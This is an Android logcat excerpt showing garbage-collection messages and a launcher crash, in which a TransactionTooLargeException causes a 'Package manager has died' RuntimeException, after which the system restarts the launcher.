E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
D/dalvikvm(26419): GC_FOR_ALLOC freed 663K, 9% free 9181K/9991K, paused 16ms, total 16ms
I/dalvikvm-heap(26419): Grow heap (frag case) to 10.011MB for 1048592-byte allocation
D/dalvikvm(26419): GC_CONCURRENT freed 21K, 9% free 10184K/11079K, paused 2ms+3ms, total 25ms
D/dalvikvm(26419): GC_CONCURRENT freed 1842K, 17% free 9714K/11655K, paused 2ms+2ms, total 21ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 4ms
D/dalvikvm(26419): GC_FOR_ALLOC freed 231K, 16% free 9808K/11655K, paused 15ms, total 15ms
D/dalvikvm(26419): GC_CONCURRENT freed 1065K, 16% free 9894K/11655K, paused 3ms+4ms, total 29ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
E/JavaBinder(26419): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26419): threadid=10: thread exiting with uncaught exception (group=0x40d782a0)
D/dalvikvm(26419): GC_CONCURRENT freed 1103K, 15% free 9976K/11655K, paused 3ms+5ms, total 122ms
E/AndroidRuntime(26419): FATAL EXCEPTION: launcher-loader
E/AndroidRuntime(26419): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26419): at com.android.launcher2.ApplicationInfo.<init>(ApplicationInfo.java:88)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAllAppsByBatch(LauncherModel.java:1773)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAndBindAllApps(LauncherModel.java:1665)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.run(LauncherModel.java:979)
E/AndroidRuntime(26419): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26419): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26419): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26419): at android.os.HandlerThread.run(HandlerThread.java:60)
E/AndroidRuntime(26419): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26419): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26419): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26419): … 8 more
W/ActivityManager(14833): Force finishing activity com.android.launcher/com.android.launcher2.Launcher
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0×10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +393ms